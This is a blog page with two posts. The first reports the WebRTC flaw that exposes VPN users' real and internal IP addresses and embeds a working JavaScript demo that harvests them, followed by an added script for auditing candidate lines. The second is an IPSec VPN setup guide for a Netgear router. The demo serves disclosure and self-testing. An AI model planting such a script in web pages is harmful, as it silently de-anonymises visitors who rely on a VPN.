Hackviking He killed Chuck Norris, he ruled dancing so he took up a new hobby…

6 Feb 2015 | 1 comment

WebRTC vulnerability exposes VPN users

It's now easy to expose the true IP address of VPN users. Daniel Roesler published an example of how to exploit the bug on GitHub. Firefox, Mozilla, Chrome and Internet Explorer (with a WebRTC plugin) are vulnerable to this bug. WebRTC is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using a VPN, the computer's internal network address will be exposed. WebRTC uses this mechanism to handle NAT on the network and to bind sessions to the public IP. However, the bug is really nasty because it exposes these functions to JavaScript, so the entire implementation below is written in JavaScript. The request is not registered in the developer console and cannot be blocked by plugins.

If the user is using a lightweight VPN client, like a Chrome plugin, the VPN will be bypassed altogether and both the real public IP and the internal NAT address will be shown.

Below is a demo. If you see your public and private IP addresses, your browser is vulnerable to this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

Your public IP addresses:

      <script>
      //expects two list elements on the page with ids "localip" and "publicip"
      function getIPs(){
          var ip_dups = {};
          //compatibility for firefox and chrome
          var RTCPeerConnection = window.RTCPeerConnection
              || window.mozRTCPeerConnection
              || window.webkitRTCPeerConnection;
          var mediaConstraints = {
              optional: [{RtpDataChannels: true}]
          };
          //firefox already has a default stun server in about:config
          // media.peerconnection.default_iceservers =
          // [{"url": "stun:stun.services.mozilla.com"}]
          var servers = undefined;
          //add same stun server for chrome
          if(window.webkitRTCPeerConnection){
              servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
          }
          //construct a new RTCPeerConnection
          var pc = new RTCPeerConnection(servers, mediaConstraints);
          //listen for candidate events
          pc.onicecandidate = function(ice){
              //skip non-candidate events
              if(ice.candidate){
                  //match just the IPv4 address
                  var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
                  var match = ip_regex.exec(ice.candidate.candidate);
                  //skip candidates that carry no IPv4 address, and duplicates
                  if(match === null || ip_dups[match[1]] !== undefined) return;
                  var ip_addr = match[1];
                  ip_dups[ip_addr] = true;
                  var li = document.createElement("li");
                  li.textContent = ip_addr;
                  //local IPs (trailing \. keeps 172.160.x.x out of the private range)
                  if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01])\.)/)){
                      document.getElementById("localip").appendChild(li);
                  }
                  //assume the rest are public IPs
                  else {
                      document.getElementById("publicip").appendChild(li);
                  }
              }
          };
          //create a bogus data channel
          pc.createDataChannel("");
          //create an offer sdp
          pc.createOffer(function(result){
              //trigger the stun server request
              pc.setLocalDescription(result, function(){}, function(){});
          }, function(){});
      }
      //run the demo once the script is loaded
      getIPs();
      </script>
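
To check what a browser's candidates actually reveal, the following added example (not part of the original post or of Daniel Roesler's code) parses ICE candidate lines and reports which addresses they expose. It goes beyond the demo's IPv4 regex by also reading the `raddr` field, IPv6 addresses and the mDNS `.local` names some current browsers substitute for host addresses; `SAMPLE_CANDIDATES` is constructed input and all function names are illustrative.

```javascript
// Added example: audit ICE candidate lines for address exposure.
// SAMPLE_CANDIDATES is constructed input (private and documentation ranges only).
const SAMPLE_CANDIDATES = [
  "candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host",
  "candidate:2 1 udp 1686052607 203.0.113.7 54321 typ srflx raddr 192.168.1.23 rport 54321",
  "candidate:3 1 udp 2122260223 3f2a9c1e-0000-4000-8000-000000000001.local 54322 typ host",
  "a=end-of-candidates",
];

// RFC 1918 plus link-local, compared per octet so 172.160.x.x is not misread as private.
function isPrivateV4(addr) {
  const m = /^(\d{1,3})\.(\d{1,3})\.\d{1,3}\.\d{1,3}$/.exec(addr);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 10 || (a === 192 && b === 168) || (a === 169 && b === 254) ||
         (a === 172 && b >= 16 && b <= 31);
}

// candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> [raddr <addr> ...]
function parseCandidate(line) {
  const f = line.trim().replace(/^a=/, "").split(/\s+/);
  if (!f[0].startsWith("candidate:") || f.length < 8 || f[6] !== "typ") return null;
  const i = f.indexOf("raddr");
  return { address: f[4], type: f[7], raddr: i > 7 && f[i + 1] ? f[i + 1] : null };
}

function auditCandidates(lines) {
  const report = { privateV4: [], publicV4: [], ipv6: [], masked: [], skipped: 0 };
  const add = (list, v) => { if (!list.includes(v)) list.push(v); };
  for (const line of lines) {
    const c = parseCandidate(line);
    if (!c) { report.skipped += 1; continue; }            // not a candidate line
    for (const addr of [c.address, c.raddr]) {
      if (!addr || addr === "0.0.0.0") continue;          // placeholder, not an address
      if (addr.endsWith(".local")) add(report.masked, addr);      // mDNS-obfuscated host
      else if (addr.includes(":")) add(report.ipv6, addr);
      else if (isPrivateV4(addr)) add(report.privateV4, addr);    // internal NAT address
      else if (/^\d{1,3}(\.\d{1,3}){3}$/.test(addr)) add(report.publicV4, addr); // as seen by STUN
    }
  }
  return report;
}

console.log(auditCandidates(SAMPLE_CANDIDATES));
```

Run it against the `candidate` strings your own browser produces with the VPN connected; anything in `publicV4` other than the tunnel's exit address, or any entry in `privateV4`, is the exposure described above.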
      

1 Oct 2010 | 38 comments

IPSec VPN with Netgear FVS318v3

My Belkin N1 Vision router decided to die the other day, so I realized it was time for an industrial-strength router. I checked out a really nice one with Linux built in and great application support. It was a little pricey for me right now; I just got a new girlfriend and moved in with her.... 🙂

I finally decided on the Netgear FVS318v3, which comes with a built-in IPSec VPN server for 8 concurrent connections. Netgear wants ~$50 for the client software, which I wasn't really happy about paying, so I started checking around for a free alternative. Finally I came across Shrew Soft VPN Client (http://www.shrew.net/). It's free and really lightweight. It took some figuring out to configure it all, so I thought it was a good idea to share it.

I presume that you already have DynDNS enabled. If you have a dynamic WAN address, it's a must to get this to work.

First you have to set up your FVS318 router to accept the connections.

1. Log on to your router and go to the "VPN Wizard" in the left-hand menu.
2. Just click "Next"...
3. You have to set a name for your connection and a pre-shared key (PSK). Select "A remote VPN client" as connection type.
4. You will get a confirmation screen next. Just click "Done".

Now your router is up to speed and you need to download the VPN client from http://www.shrew.net/download. Once installed, it's time to set up your new connection.

1. In the router admin page select "IKE Policies" in the left-hand menu. The two pieces of information you are interested in are "Local ID" and "Remote ID".
2. Now start Shrew Soft VPN Access Manager and click "Add".
3. Now enter your DynDNS name, or static WAN address if you have one, in the "Host Name or IP Address" field.
4. Set "Auto Configuration" to "disabled".
5. Set "Local Host" - "Address Method" to "Use an existing adapter and current address".
6. Now go to the "Name Resolution" tab. If you know the addresses of the WINS server and/or DNS server on the remote network, enter them here. If not, uncheck the check boxes.
7. Now go to the "Authentication" tab and set "Authentication Method" to "Mutual PSK".
8. "Local Identity" should be the field "Remote ID" on the router's "IKE Policies" page. "Identification Type" should be "Fully Qualified Domain Name".
9. On the "Remote Identity" tab the "Identification Type" should be "Fully Qualified Domain Name" and "FQDN String" should be the "Local ID" from the router's "IKE Policies" page.
10. Moving on to the "Credentials" tab, fill in your PSK in the "Pre Shared Key" field. In this case "areallylamekey".
11. Then go to the main tab "Policy".
12. Uncheck the "Obtain Topology Automatically or Tunnel All" check box.
13. Click the "Add" button.
14. Type in your network. To route all the 192.168.0.x addresses over the VPN tunnel, enter address 192.168.0.0 and netmask 255.255.255.0. If you have the same network address range at home and in your current location, you can enter specific addresses or add another topology entry that excludes those addresses.
15. Then hit "Save" and you will return to the main window.
16. Double-click your connection and select "Connect". That's it!

You're now up and running with your own secure IPSec tunnel to your home or office!